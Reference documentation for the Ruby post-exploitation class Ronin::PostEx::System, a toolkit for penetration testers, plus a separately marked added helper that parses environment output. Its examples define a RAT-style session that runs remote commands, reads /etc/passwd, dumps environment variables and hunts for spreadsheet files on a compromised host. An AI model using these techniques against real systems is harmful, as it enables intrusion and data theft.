Class: Ronin::PostEx::System

Inherits:
Resource
Defined in:
lib/ronin/post_ex/system.rb,
lib/ronin/post_ex/system/fs.rb,
lib/ronin/post_ex/system/shell.rb,
lib/ronin/post_ex/system/process.rb

Overview

Represents a successfully compromised system. The System class wraps around a session object which defines a syscall-like post-exploitation API for reading/writing files, running commands, etc.

Supported API Functions

  • sys_time -> Integer
  • sys_hostname -> String

Example

Define the session class which defines the Post-Exploitation API methods:

require 'base64'

class SimpleRATSession < Ronin::PostEx::Sessions::Session

  def initialize(socket)
    @socket = socket
  end

  def call(name,*args)
    @socket.puts("#{name} #{args.join(' ')}")

    Base64.strict_decode64(@socket.gets(chomp: true))
  end

  def shell_exec(command)
    call('EXEC',command)
  end

  def fs_readfile(path)
    call('READ',path)
  end

  def process_pid
    call('PID').to_i
  end

  def process_getuid
    call('UID').to_i
  end

  def process_environ
    Hash[
      call('ENV').each_line(chomp: true).map { |line|
        line.split('=',2)
      }
    ]
  end

end

Initialize a new System object that wraps around the client:

session = SimpleRATSession.new(socket)
system  = Ronin::PostEx::System.new(session)

Interact with the system's remote files as if they were local files:

file = system.fs.open('/etc/passwd')
file.each_line do |line|
  user, x, uid, gid, name, home_dir, shell = line.split(':')

  puts "User Detected: #{user} (id=#{uid})"
end

Get information about the current process:

system.process.pid
# => 1234
system.process.getuid
# => 1001
system.process.environ
# => {"HOME"=>"...", "PATH"=>"...", ...}

Execute commands on the remote system:

system.shell.ls('/')
# => "bin\nboot\ndev\netc\nhome\nlib\nlib64\nlost+found\nmedia\nmnt\nopt\nproc\nroot\nrun\nsbin\nsnap\nsrv\nsys\ntmp\nusr\nvar\n"
system.shell.exec("find /srv -type f -name '*.xls'") do |path|
  puts "Found XLS file: #{path}"
end
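The `process_environ` method in the session class above trusts the shape of the remote response: a blank line yields an empty pair that `Hash[]` rejects, and a line without `=` becomes a key with a `nil` value. The following is an added example, not code from ronin-post_ex; `parse_environ` is a hypothetical helper and `SAMPLE_ENV` is constructed input, showing one way to treat that response as untrusted data.

```ruby
# Hypothetical helper (not part of ronin-post_ex): parses the decoded "ENV"
# response into a Hash and collects malformed lines instead of failing.
#
# Returns [env, skipped], where env maps variable names to values and
# skipped lists the lines that were not usable NAME=VALUE pairs.
def parse_environ(text)
  env     = {}
  skipped = []

  # chomp: true strips "\n" as well as "\r\n" line endings.
  text.each_line(chomp: true) do |line|
    next if line.empty?

    # partition splits on the first '=' only, so values may contain '='.
    name, sep, value = line.partition('=')

    if sep.empty? || name.empty?
      # No '=' at all, or an empty variable name: keep it for review.
      skipped << line
      next
    end

    env[name] = value
  end

  [env, skipped]
end

# Constructed sample response, as it would look after Base64 decoding.
SAMPLE_ENV = "HOME=/home/app\r\nPATH=/usr/bin:/bin\nOPTS=a=b=c\n" \
             "EMPTY=\n\nnot a pair\n=orphan\n"

if $PROGRAM_NAME == __FILE__
  env, skipped = parse_environ(SAMPLE_ENV)
  env.each { |name, value| puts "#{name}=#{value.inspect}" }
  skipped.each { |line| warn "skipped malformed line: #{line.inspect}" }
end
```

A session class could call such a helper from `process_environ` in place of the `Hash[...]` expression.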

Defined Under Namespace

Classes: FS, Process, Shell

Instance Attribute Summary

Attributes inherited from Resource

#session

Instance Method Summary

Methods inherited from Resource

#supports, #supports?

Constructor Details

#initialize(session) ⇒ System

Initializes the system.

Parameters:

  • session (Object)

    The object which defines the Post-Exploitation API methods.



# File 'lib/ronin/post_ex/system.rb', line 137

def initialize(session)
  super(session)

  @fs      = FS.new(session)
  @process = Process.new(session)
  @shell   = Shell.new(session)
end

Instance Attribute Details

#fs ⇒ System::FS (readonly)

The File-System resource.

Returns:



# File 'lib/ronin/post_ex/system.rb', line 119

def fs
  @fs
end

#process ⇒ System::Process (readonly)

The Process resource.

Returns:



# File 'lib/ronin/post_ex/system.rb', line 124

def process
  @process
end

#shell ⇒ System::Shell (readonly)

The Shell resource.

Returns:



# File 'lib/ronin/post_ex/system.rb', line 129

def shell
  @shell
end

Instance Method Details

#exit ⇒ Object

Exits the process.



# File 'lib/ronin/post_ex/system.rb', line 185

def exit
  @process.exit
end

#hostname ⇒ String

Note:

Requires the sys_hostname method be defined by the Resource#session object.

Gets the system's hostname.

Returns:

  • (String)

    The system's local hostname.



# File 'lib/ronin/post_ex/system.rb', line 169

def hostname
  @session.sys_hostname
end

#interact ⇒ Object

Starts an interactive post-exploitation system shell.



# File 'lib/ronin/post_ex/system.rb', line 176

def interact
  CLI::SystemShell.start(self)
end

#time ⇒ Time

Note:

Requires the sys_time method be defined by the Resource#session object.

Gets the current time.

Returns:

  • (Time)

    The current time.



# File 'lib/ronin/post_ex/system.rb', line 154

def time
  Time.at(@session.sys_time.to_i)
end